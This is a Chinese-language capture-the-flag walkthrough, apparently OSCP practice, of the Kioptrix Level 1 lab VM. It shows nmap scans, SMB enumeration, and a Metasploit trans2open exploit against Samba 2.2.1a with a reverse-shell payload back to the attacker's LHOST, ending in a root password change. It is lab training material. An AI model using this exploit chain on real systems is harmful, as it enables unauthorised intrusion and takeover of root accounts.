# Sub. Kioptrix: Level 1 滲透過程(已完成) ## 建立練習靶機的資料夾 mkdir oscp-ctf/mkdir Kioptrix1 cd oscp-ctf/mkdir Kioptrix1 1. 訊息搜集 1.1 掃描網段中活動的主機並存成txt檔 nmap -n -sn -sP 172.20.10.* -oG Kioptrix1_ip.txt 1.2 對目標主機做掃描並存成xml檔 nmap -p- -sV -sS -T4 -A -oX Kioptrix_lv1.xml 172.20.10.4 -p- 掃描全部port號(1-65535) -sV 掃瞄服務程序版本 -sS TCP SYN 掃描 -T4 掃描時序(0-5) 數字越大速度越快 -A 綜合掃描(OS類型 服務版本 默認腳本掃描 traceroute) -oX 輸出的格式為XML 格式 vi Kioptrix_lv1.xml 查看XML檔案  2. 分析port 利用漏洞 samba是啥:https://noob.tw/samba/ <port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="netbios-ssn" product="Samba smbd" extrainfo="workgroup: iwMYGROUP" method="probed" conf="10"><cpe>cpe:/a:samba:samba</cpe></service></port> - enum4linux 172.20.10.4 如果smb存在空會話認證就可以利用服務去搜集目標系統的訊息。 結果只得到目標的主機名稱:  使用msf: - use auxiliary/scanner/smb/smb_version 用於掃描smb服務版本。 執行後找到服務版本為Samba 2.2.1a  - back - search samba 返回後開始找samba版本漏洞 - searchsploit samba 2.2.1 a  - 找到linux os相關的第22項 存在緩衝區溢位漏洞 use exploit/linux/samba/trans2open  show options 上半部為模塊選項  下半部為Payload 選項 LHOST 172.20.10.3 開啟了自己的ip位置 reverse_tcp 反相連接  - set RHOSTS 172.20.10.4 - exploit 得到的結果是Meterpreter session 死掉了, 因為這邊會用到Meterpreter模組而這個模組版本比較新,靶機的VM 版本比較舊  - 改變payload set payload linux/x86/shell_reverse_tcp 做一個反向SHELL連接 - show options  - exploit  這邊發現會話開啟了得到目標主機的地址了 passwd 改密碼 改完後嘗試登入靶機確認可以成功登入root  ###### tags: `Sub-OSCP`
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up